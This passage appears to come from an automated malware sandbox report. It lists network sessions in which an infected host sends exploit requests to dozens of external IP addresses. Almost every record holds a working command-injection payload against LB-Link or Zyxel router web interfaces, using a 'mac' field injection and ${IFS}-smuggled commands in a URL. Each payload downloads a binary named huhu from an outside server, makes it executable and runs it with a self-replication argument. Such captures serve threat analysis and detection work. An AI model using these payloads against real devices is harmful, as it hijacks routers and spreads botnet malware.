                                                content-length: 0
                                                date: Mon, 29 Jan 2024 06:07:35 GMT


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1247192.168.2.2357988115.6.184.1138080
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.517626047 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:07:35.810049057 CET103INHTTP/1.1 404 Not Found
                                                Content-Type: text/plain
                                                Content-Length: 30
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1248192.168.2.236098294.120.20.218080
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.676877022 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1249192.168.2.235134635.187.159.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.067208052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1250192.168.2.234335468.237.112.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.067235947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1251192.168.2.235753037.29.137.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.067265034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1252192.168.2.2338706187.167.142.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.067327023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1253192.168.2.2335742191.143.70.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.067353964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1254192.168.2.233381237.25.254.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.067415953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1255192.168.2.2345886136.222.46.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.067430019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1256192.168.2.233779668.9.147.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.067559004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1257192.168.2.23330888.130.171.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.067594051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1258192.168.2.2337132210.157.41.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.067636967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1259192.168.2.2339482118.224.82.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.067670107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1260192.168.2.233478063.186.87.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.067717075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1261192.168.2.2355778203.82.190.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.067756891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1262192.168.2.2350306131.67.66.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.067792892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1263192.168.2.2360206115.237.41.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.067826986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1264192.168.2.233790643.193.161.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.067872047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1265192.168.2.2348668163.169.156.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.067892075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1266192.168.2.235772680.113.176.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.067944050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1267192.168.2.235205858.133.3.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.067970991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1268192.168.2.235227042.54.248.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.068027973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1269192.168.2.236066495.148.1.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.068053961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1270192.168.2.2341934119.156.89.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.068104029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1271192.168.2.2353826136.131.132.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.068171978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1272192.168.2.2357790195.114.121.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.068219900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1273192.168.2.2353200172.38.85.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.068269968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1274192.168.2.234886663.49.52.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.068316936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1275192.168.2.234897232.183.84.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.068346024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1276192.168.2.2357686154.84.21.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.068371058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1277192.168.2.234266646.134.213.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.068418980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1278192.168.2.2348330154.253.113.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.068440914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1279192.168.2.2354436138.247.250.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.068499088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1280192.168.2.234187640.178.60.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.068535089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1281192.168.2.235253225.71.122.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.068551064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1282192.168.2.235402873.1.27.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.068619967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1283192.168.2.234919032.116.216.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.068675995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1284192.168.2.2339176219.193.110.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.068705082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1285192.168.2.2346754205.95.183.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.068731070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1286192.168.2.23448665.25.10.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.068804026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1287192.168.2.234083864.112.221.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.068850040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1288192.168.2.235683617.172.45.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.068887949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1289192.168.2.23455764.151.147.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.068926096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1290192.168.2.2340890220.50.196.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.068948030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1291192.168.2.2352606216.25.75.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.068994045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1292192.168.2.2336134156.148.7.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.069029093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1293192.168.2.2333712211.24.71.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.069055080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1294192.168.2.2335310197.39.73.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.069108009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1295192.168.2.2333304216.162.240.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.069156885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1296192.168.2.2349400107.18.131.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.069185972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1297192.168.2.233507662.88.30.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.069231987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1298192.168.2.233630269.187.24.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.069267988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1299192.168.2.2359468168.252.195.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.069291115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1300192.168.2.23488164.68.156.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.069353104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1301192.168.2.2350796106.189.109.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.069399118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1302192.168.2.2350452201.189.15.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.069446087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1303192.168.2.2360108141.158.219.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.069477081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1304192.168.2.234330045.28.246.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.069513083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1305192.168.2.2334730201.127.87.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.069554090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1306192.168.2.2344888117.80.66.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.069586992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1307192.168.2.2343868182.1.190.12443
